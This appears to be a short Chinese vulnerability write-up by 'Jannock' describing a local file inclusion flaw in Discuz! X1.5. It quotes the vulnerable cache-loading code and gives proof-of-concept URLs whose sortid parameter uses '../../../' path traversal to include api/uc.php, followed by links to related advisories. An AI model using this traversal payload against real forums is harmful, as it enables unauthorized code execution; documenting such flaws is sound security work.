config_global.php
复制代码代码如下:
$_config['cache']['type'] = ‘file’;
function cachedata($cachenames) {
……
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
……
if($isfilecache) {
$lostcaches = array();
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
$lostcaches[] = $cachename;
}
}
……
}
地址:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
执行了 api/uc.php 页面代码了。
作者: Jannock
【DISCUZ X1.5 本地文件包含漏洞说明】相关文章:
★ Adobe Flash Player 9.0.124.0 修改多个安全漏洞
★ Coppermine Photo Gallery跨站脚本及SQL注入漏洞
★ Linux Kiss Server lks.c文件多个格式串处理漏洞
★ Ewebeditor2.8.0最终版删除任意文件漏洞分析与解决方法